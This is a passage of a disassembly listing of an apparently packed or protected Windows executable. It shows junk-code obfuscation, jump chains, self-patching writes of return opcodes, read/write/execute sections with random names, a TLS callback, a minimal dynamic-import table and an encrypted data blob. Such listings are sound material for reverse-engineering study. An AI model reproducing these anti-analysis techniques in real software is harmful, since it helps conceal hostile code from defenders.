mov byte ptr [eax], 0C3h
jmp loc_43B40B
; ---------------------------------------------------------------------------
push edi
jmp loc_44CE29
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445188
loc_45A8A1: ; CODE XREF: sub_445188:loc_449638j
cmp al, 0A4h
jz loc_44E823
jmp loc_44D989
; END OF FUNCTION CHUNK FOR sub_445188
; ---------------------------------------------------------------------------
loc_45A8AE: ; CODE XREF: ut7h7i2x:0045A635j
and ecx, 4882EADFh
test edi, 2E14A5C5h
jmp loc_43CE17
; ---------------------------------------------------------------------------
loc_45A8BF: ; CODE XREF: ut7h7i2x:0045807Fj
add ecx, eax
; =============== S U B R O U T I N E =======================================
sub_45A8C1 proc near ; CODE XREF: ut7h7i2x:0043FEC3p
; FUNCTION CHUNK AT 00439068 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0043A4F9 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043CC58 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00445C72 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044975D SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044C3D5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C590 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
call sub_454596
push 3D8FF392h
jmp loc_44C3D5
sub_45A8C1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
shl ebx, 15h
jmp sub_449F12
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44193F
loc_45A8DC: ; CODE XREF: sub_44193F+7j
call sub_454196
retn
; END OF FUNCTION CHUNK FOR sub_44193F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4489DF
loc_45A8E2: ; CODE XREF: sub_4489DF+375Cj
jmp loc_439A91
; END OF FUNCTION CHUNK FOR sub_4489DF
; ---------------------------------------------------------------------------
db 0A5h
dword_45A8E8 dd 0 ; DATA XREF: sub_44B789+581Fw
; =============== S U B R O U T I N E =======================================
sub_45A8EC proc near ; CODE XREF: sub_4176BD+31p
; DATA XREF: fabskl8p:off_41D008o
; FUNCTION CHUNK AT 0044111B SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044ACAE SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044E9B8 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044EF5A SIZE 00000005 BYTES
jz loc_44111B
push offset sub_44FB67
jmp loc_449EB2
sub_45A8EC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_45A8FC proc near ; CODE XREF: sub_43FF65+DF31j
retn
sub_45A8FC endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BC1B
loc_45A8FD: ; CODE XREF: sub_43BC1B+11A63j
jmp sub_446215
; END OF FUNCTION CHUNK FOR sub_43BC1B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_45A902: ; CODE XREF: sub_457A66:loc_44D52Aj
jmp sub_445277
; END OF FUNCTION CHUNK FOR sub_457A66
; =============== S U B R O U T I N E =======================================
sub_45A907 proc near ; CODE XREF: ut7h7i2x:loc_445328j
; ut7h7i2x:00447293j ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043CDB0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457B71 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00458275 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00458D52 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00459136 SIZE 00000014 BYTES
jnb loc_457B71
pop edx
mov eax, [esp-4+arg_0]
loc_45A911: ; CODE XREF: ut7h7i2x:00439D9Aj
push edx
push edx
push 142827BAh
pop edx
jmp loc_459136
sub_45A907 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DA5B
loc_45A91E: ; CODE XREF: sub_44DA5B+Bj
mov byte ptr [eax], 0C3h
jmp sub_4596E5
; END OF FUNCTION CHUNK FOR sub_44DA5B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4596E5
loc_45A926: ; CODE XREF: sub_4596E5+1j
mov eax, [esp+4+var_4]
push edx
nop
mov eax, 6FDE1A91h
call sub_43AA94
jmp loc_444908
; END OF FUNCTION CHUNK FOR sub_4596E5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_45A93A: ; CODE XREF: sub_43CCC3+B7E5j
or eax, ds:4000F4h
add eax, 4C8A9BAh
mov eax, [eax]
or eax, eax
jnz loc_446620
jmp loc_44B18A
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
loc_45A955: ; CODE XREF: ut7h7i2x:loc_4407C0j
js loc_44A12B
shr ebp, 1Eh
jmp sub_449C5B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C413
loc_45A963: ; CODE XREF: sub_43C413:loc_443381j
jz loc_44883E
jmp loc_43CDC8
; END OF FUNCTION CHUNK FOR sub_43C413
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447D5B
loc_45A96E: ; CODE XREF: sub_447D5B+Ej
call sub_453D8B
push offset sub_4473F5
jmp nullsub_566
; END OF FUNCTION CHUNK FOR sub_447D5B
; ---------------------------------------------------------------------------
loc_45A97D: ; CODE XREF: ut7h7i2x:004453B0j
; ut7h7i2x:00445965j
push ecx
mov ecx, eax
xchg ecx, [esp]
ror eax, 3
push esi
push 65BA036h
jmp loc_44130E
; ---------------------------------------------------------------------------
loc_45A991: ; CODE XREF: ut7h7i2x:loc_450B49j
jnz loc_453098
jmp loc_458DEE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B789
loc_45A99C: ; CODE XREF: sub_44B789+AD2Fj
add eax, 11FE6D4Dh
jmp loc_457FAB
; END OF FUNCTION CHUNK FOR sub_44B789
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4549F0
loc_45A9A7: ; CODE XREF: sub_4549F0j
push 3EFE38F8h
pop eax
rol eax, 0Eh
jmp loc_43FA37
; END OF FUNCTION CHUNK FOR sub_4549F0
; ---------------------------------------------------------------------------
push eax
ror eax, 12h
mov ds:dword_443768, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A7D2
loc_45A9C0: ; CODE XREF: sub_44A7D2+13j
jmp nullsub_464
; END OF FUNCTION CHUNK FOR sub_44A7D2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443CE1
loc_45A9C5: ; CODE XREF: sub_443CE1+5j
jmp nullsub_465
; END OF FUNCTION CHUNK FOR sub_443CE1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_45A9CA: ; CODE XREF: sub_44EC11-4741j
mov esi, edx
loc_45A9CC: ; CODE XREF: ut7h7i2x:0043ED7Dj
or ebx, eax
jmp loc_439BD7
; END OF FUNCTION CHUNK FOR sub_44EC11
; ---------------------------------------------------------------------------
loc_45A9D3: ; CODE XREF: ut7h7i2x:loc_454808j
add edx, 0F4455693h
xchg edx, [esp]
jmp sub_43AA94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440944
loc_45A9E1: ; CODE XREF: sub_440944:loc_43FD55j
shr ebx, 0Fh
mov edx, edi
jnb loc_459F35
add edx, 0F9EE8D9Ch
jnz loc_446E93
jmp loc_449EA8
; END OF FUNCTION CHUNK FOR sub_440944
; ---------------------------------------------------------------------------
and eax, 0F95C74B3h
jmp sub_44A3D6
; =============== S U B R O U T I N E =======================================
sub_45AA08 proc near ; CODE XREF: sub_45410C+1334p
; FUNCTION CHUNK AT 004487C8 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
push 38F10390h
pop ebx
sub ebx, 8D86C7D1h
push offset loc_44354F
jmp loc_4487C8
sub_45AA08 endp
; ---------------------------------------------------------------------------
mov eax, 4C5D3995h
call sub_43AA94
call sub_4504EC
; START OF FUNCTION CHUNK FOR sub_4549F0
loc_45AA31: ; CODE XREF: sub_4549F0:loc_44814Cj
jnz sub_459772
jmp loc_43F88E
; END OF FUNCTION CHUNK FOR sub_4549F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B9B1
loc_45AA3C: ; CODE XREF: sub_43B9B1+5D6Dj
popf
jmp loc_454070
; END OF FUNCTION CHUNK FOR sub_43B9B1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4408C2
loc_45AA42: ; CODE XREF: sub_4408C2:loc_43DB89j
cmp dword ptr [ebp-4], 2
jnz loc_454070
jmp loc_43C893
; END OF FUNCTION CHUNK FOR sub_4408C2
; ---------------------------------------------------------------------------
jl loc_445B02
and ebx, edx
loc_45AA59: ; CODE XREF: ut7h7i2x:loc_442AA3j
rol ebx, 17h
add ebx, 76FC677Ch
xchg ebx, [esp]
jmp loc_439DD1
; ---------------------------------------------------------------------------
loc_45AA6A: ; CODE XREF: ut7h7i2x:0044A0C9j
test esi, eax
jmp loc_43FABF
; ---------------------------------------------------------------------------
loc_45AA71: ; CODE XREF: ut7h7i2x:loc_4556BBj
call sub_44ED9F
call sub_439280
loc_45AA7B: ; CODE XREF: ut7h7i2x:004597C9j
jmp locret_44C612
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4523CA
loc_45AA80: ; CODE XREF: sub_4523CA:loc_448D69j
sub eax, 69C67356h
call sub_44D7AC
locret_45AA8B: ; CODE XREF: sub_4563CB:loc_45610Cj
retn
; END OF FUNCTION CHUNK FOR sub_4523CA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446258
loc_45AA8C: ; CODE XREF: sub_446258+8F4Aj
jmp loc_458370
; END OF FUNCTION CHUNK FOR sub_446258
; ---------------------------------------------------------------------------
loc_45AA91: ; CODE XREF: ut7h7i2x:loc_4571A8j
push ebx
push 16FA045Bh
pop ebx
rol ebx, 1Bh
cmp ebx, 0AA1C5B02h
jmp loc_4402CD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CAF4
loc_45AAA6: ; CODE XREF: sub_43CAF4+1B472j
and edx, 52FE56BDh
mov esi, edi
test ebp, ecx
jmp loc_43A28D
; END OF FUNCTION CHUNK FOR sub_43CAF4
; ---------------------------------------------------------------------------
loc_45AAB5: ; CODE XREF: ut7h7i2x:00452773j
sub ebp, 762C2A4Fh
mov ebp, ecx
loc_45AABD: ; CODE XREF: ut7h7i2x:loc_450C54j
push 0F4546308h
pop eax
sub eax, 0B80EE19Bh
rol eax, 18h
jmp loc_442CED
; =============== S U B R O U T I N E =======================================
sub_45AAD1 proc near ; CODE XREF: sub_4524FE-88D7p
; ut7h7i2x:0045562Bj
; FUNCTION CHUNK AT 0044A3E5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BD70 SIZE 0000000F BYTES
xchg esi, [esp+0]
pop esi
jnz loc_44BD70
mov eax, 6
sub eax, [ebp-0Ch]
mov [ebp-0Ch], eax
jmp loc_44A3E5
sub_45AAD1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_45AAEB: ; CODE XREF: sub_4524FE:loc_449C1Dj
cmp dword ptr [ebp-1Ch], 66h
jmp loc_44F0B7
; END OF FUNCTION CHUNK FOR sub_4524FE
; ---------------------------------------------------------------------------
loc_45AAF4: ; CODE XREF: ut7h7i2x:loc_43CCFEj
add eax, ebp
loc_45AAF6: ; CODE XREF: ut7h7i2x:0043EF11j
add eax, 0C1DB7C06h
mov eax, [eax]
and dword ptr [eax+24h], 7FFFFFFFh
lea eax, [ebp-14h]
push edx
mov edx, eax
push offset sub_443127
jmp loc_4469B4
; ---------------------------------------------------------------------------
loc_45AB15: ; DATA XREF: sub_440CEC:loc_44BC51o
mov [ebp-8], eax
; START OF FUNCTION CHUNK FOR sub_440CEC
loc_45AB18: ; CODE XREF: sub_440CEC+23F5j
call sub_459D1C
mov [ebp-0Ah], al
loc_45AB20: ; CODE XREF: sub_459D0E:loc_439CB7j
call sub_43F7B6
loc_45AB25: ; CODE XREF: sub_44DB48+50C9j
jmp loc_450F00
; END OF FUNCTION CHUNK FOR sub_440CEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455145
loc_45AB2A: ; CODE XREF: sub_44FEF8+Dj
jmp nullsub_1
; END OF FUNCTION CHUNK FOR sub_455145
; ---------------------------------------------------------------------------
add ebx, 0B3AC1F4Ch
jmp loc_4583E5
; ---------------------------------------------------------------------------
loc_45AB3A: ; DATA XREF: sub_457CB8+6o
pop esi
; START OF FUNCTION CHUNK FOR sub_440B68
loc_45AB3B: ; CODE XREF: sub_440B68:loc_456F6Bj
push 0
push 37FE39EAh
pop eax
jmp loc_456C6B
; END OF FUNCTION CHUNK FOR sub_440B68
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E5AB
loc_45AB48: ; CODE XREF: sub_44E5AB-110B7j
jnz loc_44A1FA
test eax, ebp
jmp loc_44A1F1
; END OF FUNCTION CHUNK FOR sub_44E5AB
; ---------------------------------------------------------------------------
rol eax, 5
mov ebp, 0FBD52E7Eh
jmp sub_44FC60
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F738
loc_45AB62: ; CODE XREF: sub_44F738+3353j
mov edx, ecx
jmp loc_44B2CD
; END OF FUNCTION CHUNK FOR sub_44F738
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_45AB69: ; CODE XREF: sub_43AA94+9870j
jo loc_45381C
shl edx, 11h
loc_45AB72: ; CODE XREF: ut7h7i2x:loc_43A732j
; sub_43AA94:loc_44AD1Aj ...
push 49F50201h
pop ecx
jmp loc_43AA21
; END OF FUNCTION CHUNK FOR sub_43AA94
; =============== S U B R O U T I N E =======================================
sub_45AB7D proc near ; CODE XREF: sub_43A556p
; ut7h7i2x:004555B9j
; FUNCTION CHUNK AT 004504D2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045188B SIZE 00000014 BYTES
xchg ecx, [esp+0]
pop ecx
push edi
push 2F9A0F50h
pop edi
rol edi, 0Dh
or edi, 9DD2410Eh
add edi, 0C96E9AEFh
jmp loc_4504D2
sub_45AB7D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_45AB9C: ; CODE XREF: sub_43D021+1695Cj
jge loc_4431D3
ror edi, 1Ch
add edx, ebp
jmp loc_457E12
; END OF FUNCTION CHUNK FOR sub_43D021
; =============== S U B R O U T I N E =======================================
sub_45ABAC proc near ; DATA XREF: sub_439BF8+3BB5o
; FUNCTION CHUNK AT 0044A3F7 SIZE 00000005 BYTES
jnz loc_451C0F
push offset loc_440995
jmp loc_44A3F7
sub_45ABAC endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_45ABBC: ; CODE XREF: sub_442B3B:loc_445C46j
add ecx, 7818DEBAh
popf
xchg ecx, [esp-8+arg_4]
jmp loc_4562EB
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
mov esp, ebp
pop ebp
push eax
push 0BB7AFECCh
pop eax
rol eax, 0Fh
jmp loc_458DB1
; ---------------------------------------------------------------------------
loc_45ABDD: ; DATA XREF: ut7h7i2x:00448DF0o
push edx
call sub_44D8E8
push 1234C02Dh
pop eax
rol eax, 5
jmp loc_446231
; ---------------------------------------------------------------------------
loc_45ABF1: ; DATA XREF: sub_45076D+8o
pop ebp
push 2E451A60h
pop eax
add eax, 18F4F3AEh
jmp loc_457C43
; ---------------------------------------------------------------------------
loc_45AC03: ; CODE XREF: ut7h7i2x:00441304j
push esi
pushf
push 8A2EDC59h
pop esi
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_45AC0B: ; CODE XREF: sub_43FF65:loc_44DDE3j
or esi, 0E7C531C9h
and esi, 547F1038h
test esi, 200h
jmp loc_4593A0
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E96
loc_45AC22: ; CODE XREF: sub_449E96+3A8Bj
sbb esi, edi
shl edx, 1Fh
mov [ecx], ebp
jmp loc_4554DA
; END OF FUNCTION CHUNK FOR sub_449E96
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4565B2
loc_45AC2E: ; CODE XREF: sub_4565B2-59Cj
push offset sub_4588D1
jmp loc_4423D4
; END OF FUNCTION CHUNK FOR sub_4565B2
; ---------------------------------------------------------------------------
mov ds:off_41D154, eax
lea eax, loc_43EE00
mov byte ptr [eax], 0C3h
jmp loc_44EF13
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D683
loc_45AC4C: ; CODE XREF: sub_44D683-E882j
mov eax, [esp-4+arg_0]
push offset sub_441501
jmp loc_43A32B
; END OF FUNCTION CHUNK FOR sub_44D683
; =============== S U B R O U T I N E =======================================
sub_45AC59 proc near ; DATA XREF: ut7h7i2x:00441E24o
; FUNCTION CHUNK AT 0043A048 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D2E8 SIZE 0000000F BYTES
pushf
push 27D7E495h
pop edx
and edx, 0DE4059C6h
jmp loc_43A048
sub_45AC59 endp
; ---------------------------------------------------------------------------
loc_45AC6B: ; CODE XREF: ut7h7i2x:00447100j
push 91D3FEF5h
pop eax
or eax, 0D3BABEDh
xor eax, 0A207CFBCh
jmp loc_45873C
; ---------------------------------------------------------------------------
loc_45AC82: ; CODE XREF: ut7h7i2x:00439502j
test edx, 480F372Dh
jmp loc_458A8B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_45AC8D: ; CODE XREF: sub_43AB62+179E7j
call sub_43AA94
mov ds:off_41D090, eax
lea eax, sub_4593AA
mov byte ptr [eax], 0C3h
jmp loc_44AB5E
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
locret_45ACA6: ; CODE XREF: ut7h7i2x:loc_44B260j
retn
; ---------------------------------------------------------------------------
loc_45ACA7: ; DATA XREF: ut7h7i2x:0044FCCEo
push edx
push 0B60A525Bh
pop edx
loc_45ACAE: ; CODE XREF: ut7h7i2x:loc_43F3C5j
xor edx, 0BEDC0603h
add edx, 0F76EED67h
jmp loc_44E276
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A79F
loc_45ACBF: ; CODE XREF: sub_45A79F-7BF3j
jnz loc_44BD4D
jmp loc_441B7D
; END OF FUNCTION CHUNK FOR sub_45A79F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4580B3
loc_45ACCA: ; CODE XREF: sub_4580B3-776Fj
push esi
sub esi, 675D81C2h
test ebp, 311DFF32h
jmp loc_44F35E
; END OF FUNCTION CHUNK FOR sub_4580B3
; ---------------------------------------------------------------------------
locret_45ACDC: ; CODE XREF: ut7h7i2x:00452A0Aj
retn
; ---------------------------------------------------------------------------
locret_45ACDD: ; CODE XREF: ut7h7i2x:loc_445E8Ej
retn
; ---------------------------------------------------------------------------
loc_45ACDE: ; CODE XREF: ut7h7i2x:00458EDDj
jmp sub_43AA94
; ---------------------------------------------------------------------------
cmp edi, ecx
jmp loc_44ED93
; ---------------------------------------------------------------------------
locret_45ACEA: ; CODE XREF: ut7h7i2x:00440B85j
; ut7h7i2x:00448C67j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448321
loc_45ACEB: ; CODE XREF: sub_448321+80E9j
jmp loc_446923
; END OF FUNCTION CHUNK FOR sub_448321
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445E9E
loc_45ACF0: ; CODE XREF: sub_445E9E+5j
push 0C186B898h
pop eax
rol eax, 2
or eax, 0B45036ECh
jmp loc_44A13E
; END OF FUNCTION CHUNK FOR sub_445E9E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4512E6
loc_45AD04: ; CODE XREF: sub_4512E6:loc_457A5Cj
jz loc_441089
loc_45AD0A: ; CODE XREF: sub_45A83C-18BFAj
jmp sub_45854D
; END OF FUNCTION CHUNK FOR sub_4512E6
; ---------------------------------------------------------------------------
db 99h
dd 0F49A8A0Fh, 68E9FFFEh, 5BFFFE63h, 24C8EA81h, 88E9A225h
db 13h, 0FEh, 0FFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44825D
loc_45AD27: ; CODE XREF: sub_44825D:loc_449D82j
shl ecx, 11h
jmp loc_45287B
; END OF FUNCTION CHUNK FOR sub_44825D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_45AD2F: ; CODE XREF: sub_4459EE+10F1Fj
jz loc_45A36B
jmp loc_4450CC
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45292B
loc_45AD3A: ; CODE XREF: sub_45292B:loc_43D27Bj
; sub_4551D3:loc_4481ECj ...
jb loc_44AF7C
mov eax, ds:dword_4487F0
mov edx, [ebp+var_4]
mov byte ptr [eax+edx], 0
inc [ebp+var_4]
cmp [ebp+var_4], 100h
jmp loc_43D27B
; END OF FUNCTION CHUNK FOR sub_45292B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4529E0
loc_45AD5B: ; CODE XREF: sub_4529E0-1435Aj
or ebp, edx
loc_45AD5D: ; CODE XREF: sub_4529E0:loc_452E74j
mov eax, 0CFF9C25h
call sub_43AED9
push ecx
jmp loc_457F6B
; END OF FUNCTION CHUNK FOR sub_4529E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E2E0
loc_45AD6D: ; CODE XREF: sub_44E2E0+Ej
pop eax
xor edx, 0D59B11F0h
rol edx, 1Ah
jnb loc_43C8D4
xor ebp, 7EE90BF7h
jmp loc_43C8C9
; END OF FUNCTION CHUNK FOR sub_44E2E0
; ---------------------------------------------------------------------------
loc_45AD88: ; CODE XREF: ut7h7i2x:loc_4513F8j
pop edx
mov edx, [esp]
push edx
push eax
pop edx
xchg edx, [esp]
jmp loc_445EE5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_347. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441A79
loc_45AD98: ; CODE XREF: sub_441A79-6DB2j
jmp loc_4521A7
; END OF FUNCTION CHUNK FOR sub_441A79
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EB88
loc_45AD9D: ; CODE XREF: sub_44EB88-12C75j
mov [edx], ebp
mov eax, [ebp+0]
loc_45ADA2: ; CODE XREF: sub_44EB88:loc_43BF09j
add ebx, 60304AC1h
mov [ebx], eax
pop ebx
push ebx
push 0B7F801ADh
pop ebx
jmp loc_4414B4
; END OF FUNCTION CHUNK FOR sub_44EB88
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440493
loc_45ADB7: ; CODE XREF: sub_440493+6j
push esi
loc_45ADB8: ; CODE XREF: sub_44CAB9:loc_456CA4j
mov esi, ebp
xchg esi, [esp+4+var_4]
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
jmp loc_43EDF1
; END OF FUNCTION CHUNK FOR sub_440493
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44865D
loc_45ADC8: ; CODE XREF: sub_44865D+338Bj
jg loc_44F179
shr edx, 18h
jmp loc_449461
; END OF FUNCTION CHUNK FOR sub_44865D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F6E5
loc_45ADD6: ; CODE XREF: sub_43F6E5+Dj
xor eax, eax
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
jz loc_454C5C
mov eax, [ebp-4]
add eax, 3Ch
jmp loc_45A743
; END OF FUNCTION CHUNK FOR sub_43F6E5
; =============== S U B R O U T I N E =======================================
sub_45ADF0 proc near ; DATA XREF: sub_445E9E:loc_459D31o
; FUNCTION CHUNK AT 0043C97D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C15F SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004590A1 SIZE 0000000A BYTES
sub al, 99h
mov edx, [ebp-4]
imul byte ptr [edx]
cmp al, 0A4h
jz loc_441EB9
jmp loc_43C97D
sub_45ADF0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_45AE04: ; DATA XREF: sub_43E68B:loc_451803o
push eax
push 80E2122Fh
pop eax
and eax, 0D9CEFD3Ah
add eax, 485AE3B2h
rol eax, 16h
add eax, 9120DC1h
jmp loc_441D86
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_400. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451EF2
loc_45AE26: ; CODE XREF: sub_451EF2+9j
jmp loc_44B243
; END OF FUNCTION CHUNK FOR sub_451EF2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_45AE2B: ; CODE XREF: sub_43AA94-64j
jnz loc_4581C3
; END OF FUNCTION CHUNK FOR sub_43AA94
; START OF FUNCTION CHUNK FOR sub_44E3B1
loc_45AE31: ; CODE XREF: sub_44E3B1-1D96j
jmp sub_43F7A5
; END OF FUNCTION CHUNK FOR sub_44E3B1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442E76
loc_45AE36: ; CODE XREF: sub_442E76+5555j
jmp loc_4533A0
; END OF FUNCTION CHUNK FOR sub_442E76
; ---------------------------------------------------------------------------
test esi, ecx
jmp loc_451CCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441EC6
loc_45AE42: ; CODE XREF: sub_441EC6:loc_442E40j
mov edx, ebp
xchg edx, [esp+4+var_4]
mov ebp, esp
push esi
mov esi, ecx
xchg esi, [esp+8+var_8]
jmp loc_44239F
; END OF FUNCTION CHUNK FOR sub_441EC6
; ---------------------------------------------------------------------------
dd 12FA7698h, 0DC30EDD2h, 0BA8D912Dh, 5BD7B93Fh, 67h dup(0)
ut7h7i2x ends
; Section 7. (virtual address 0005B000)
; Virtual size : 00033000 ( 208896.)
; Section size in file : 00033000 ( 208896.)
; Offset to raw data for section: 0005B000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
znnrn47v segment para public 'CODE' use32
assume cs:znnrn47v
;org 45B000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
db 0CCh
db 0B0h, 5, 0
align 8
dd 0FFFFFFFFh, 5B03Ch, 5B0B4h, 5B108h, 0
dd 0FFFFFFFFh, 5B0E8h, 5B104h, 5 dup(0)
dd 6E72656Bh, 32336C65h, 6C6C642Eh, 0
dd 65470000h, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 6F4C0000h
dd 694C6461h, 72617262h, 4179h, 65470000h, 6F725074h, 64644163h
dd 73736572h, 0
dd 78450000h, 72507469h, 7365636Fh, 73h, 69560000h, 61757472h
dd 6C6C416Ch, 636Fh, 69560000h, 61757472h, 6572466Ch, 65h
dword_45B0B4 dd 77E79F93h ; DATA XREF: sub_48B6E8:loc_48A80Er
; sub_48D0F6+28r
dword_45B0B8 dd 77E805D8h ; DATA XREF: sub_48D0F6+37r
dword_45B0BC dd 77E7A5FDh ; DATA XREF: sub_48D0F6+8Er
dword_45B0C0 dd 77E75CB5h ; DATA XREF: sub_48A5BC:loc_48855Ar
; sub_48B9DB-32E2r ...
dword_45B0C4 dd 77E7980Ah, 77E79E34h, 5B04Ch, 5B060h, 5B070h, 5B084h
; DATA XREF: znnrn47v:0048D27Do
dd 5B094h, 5B0A4h, 0
dd 72657375h, 642E3233h, 6C6Ch, 654D0000h, 67617373h, 786F4265h
dd 41h
dword_45B104 dd 77D6ADD7h ; DATA XREF: sub_48D1AC+64r
dd 5B0F4h, 0
TlsDirectory dd 0
TlsEnd_ptr dd 0
TlsIndex_ptr dd offset TlsIndex
TlsCallbacks_ptr dd offset TlsCallbacks ; DATA XREF: sub_48B1BEo
TlsSizeOfZeroFill dd 0
TlsCharacteristics dd 0
TlsIndex dd 0 ; DATA XREF: znnrn47v:TlsIndex_ptro
TlsCallbacks dd offset TlsCallback_0 ; DATA XREF: znnrn47v:TlsCallbacks_ptro
dd 0
; ---------------------------------------------------------------------------
push esi
push ecx
mov esi, eax
mov ecx, edx
sub ecx, 4
cld
loc_45B13E: ; CODE XREF: znnrn47v:0045B155j
lodsb
shr al, 1
cmp al, 74h
jnz short loc_45B154
mov eax, [esi]
bswap eax
add eax, ecx
mov [esi], eax
add esi, 4
sub ecx, 4
loc_45B154: ; CODE XREF: znnrn47v:0045B144j
dec ecx
jg short loc_45B13E
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
db 8Bh, 0C0h
dd offset sub_401000
dd 0C000434Ah, 1, 717E0000h, 0D62820D5h, 421CFFDh, 3D050191h
dd 39EE8842h, 67077FD6h, 57782E8Ah, 0E57EC488h, 71E06C39h
dd 9D04D68Ah, 132C324Eh, 0B62F8FA4h, 0C07195Ah, 4FB5E27Eh
dd 22035E84h, 0D58410E4h, 59C57483h, 0DC28AA71h, 514DF1ABh
dd 9210211Bh, 0D85AC4F3h, 0BF01779Bh, 60EC626Eh, 22BB2EE3h
dd 4303BFC2h, 985A8DA7h, 803BF260h, 6A82018h, 83A27A8Dh
